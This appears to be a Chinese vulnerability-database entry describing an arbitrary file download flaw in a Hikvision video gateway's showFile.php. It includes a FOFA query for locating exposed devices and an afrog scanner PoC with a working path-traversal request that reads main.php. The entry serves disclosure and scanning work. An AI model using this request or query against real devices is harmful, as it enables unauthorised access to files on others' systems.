hikvision-showfile-file-read: HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞

日期: 2025-08-01 | 影响软件: HIKVISION视频编码设备接入网关 | POC: 已公开

漏洞描述

海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞 fofa: title="视频编码设备接入网关"

PoC代码[已公开]

id: hikvision-showfile-file-read

info:
  name: HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
  author: zan8in
  severity: high
  description: |-
    海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞
    fofa: title="视频编码设备接入网关"
  tags: hikvision,showfile,file-read
  created: 2024/01/17

rules:
  r0:
    request:
      method: GET
      path: /serverLog/showFile.php?fileName=../web/html/main.php
    expression: response.status == 200 && response.body.bcontains(b'$_SERVER[\'HTTP_HOST\'];') && response.body.bcontains(b'$_POST[\'userName\'];')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/hikvision-showfile-file-read.yaml

相关漏洞推荐